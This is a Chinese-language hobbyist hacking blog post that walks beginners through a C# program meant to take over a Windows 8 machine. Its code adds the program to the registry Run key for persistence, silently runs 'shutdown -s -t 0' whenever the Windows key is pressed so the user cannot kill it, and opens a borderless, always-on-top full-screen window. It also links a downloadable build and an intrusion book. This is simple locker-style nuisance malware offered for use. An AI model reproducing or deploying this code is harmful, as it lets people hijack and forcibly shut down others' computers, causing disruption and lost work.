標籤:style http os io 檔案 for art ar
昨天弄我是小白我怕誰第一期的時候無意間發現win8的一個很明顯的特徵——按win鍵會進入一種便利模式(單擊程式直接進)
嗯,這個很好,很方便,但。。。
眾所周知,系統那些按鍵鍵讓小黑們很頭疼的呢?win鍵無疑前三(ctrl+alt+del alt+F4 等等。。。)
如果不通過一些比如用鉤子之類的特殊處理就會很蛋疼,而win8把win鍵用途換了,這就是突破口!
三個動作:
1. 開機啟動(為了讓軟體能夠持久的快樂的生活)
2.屏蔽工作管理員(不讓你結束我,最好的防守就是進攻)
3.填充置頂(無邊框,頂端化)
常識:
只要學過編程的人,都可以搞爆電腦,比如一個死迴圈不斷的執行一件事情,一會記憶體就爆了,這個方法我就不說了,太沒技術含量了
詳細分析:
{開機啟動}
先分析一下如何加啟動項吧(我是小白我怕誰的第三期也會說的) 把當前exe所在的路徑寫到註冊表中,下次啟動就會運行
string KJLJ = Application.ExecutablePath; if (!System.IO.File.Exists(KJLJ))//判斷指定檔案是否存在 return; string newKJLJ = KJLJ.Substring(KJLJ.LastIndexOf("\\") + 1); RegistryKey Rkey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); if (Rkey == null) Rkey = Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"); Rkey.SetValue(newKJLJ, KJLJ);
{屏蔽工作管理員}
一般人都是用鉤子的,那個太煩,而且新手不怎麼看得懂,我教你個簡單的方法吧
用keyDown事件,當按下ctrl 或者 alt 的時候執行 ——關機(我們是小白,鬥不過你,我躲唄)
private void Form1_PreviewKeyDown(object sender, PreviewKeyDownEventArgs e) { if (e.Modifiers == Keys.LWin || e.Modifiers == Keys.RWin) { this.DNT(); //關機事件
}
}
[DllImport("user32.dll", EntryPoint = "ExitWindowsEx", CharSet = CharSet.Ansi)] private static extern int ExitWindowsEx(int uFlags, int dwReserved); public void DNT()//關機 { System.Diagnostics.Process myProcess = new System.Diagnostics.Process(); myProcess.StartInfo.FileName = "cmd.exe"; myProcess.StartInfo.UseShellExecute = false; myProcess.StartInfo.RedirectStandardInput = true; myProcess.StartInfo.RedirectStandardOutput = true; myProcess.StartInfo.RedirectStandardError = true; myProcess.StartInfo.CreateNoWindow = true; myProcess.Start(); myProcess.StandardInput.WriteLine("shutdown -s -t 0"); //-r重啟-s關機
}
{填充置頂}
表單載入的時候:
this.FormBorderStyle = FormBorderStyle.None; this.WindowState = FormWindowState.Maximized;
this.TopMost = true;
先給個我以前編的一個測試版吧,我先睡覺了,累了,明天再弄
http://pan.baidu.com/s/1bn4Bd8r
本期推薦:入侵的藝術:http://pan.baidu.com/s/1o6HMkrg 入侵的藝術和欺騙的藝術被稱為駭客經典書籍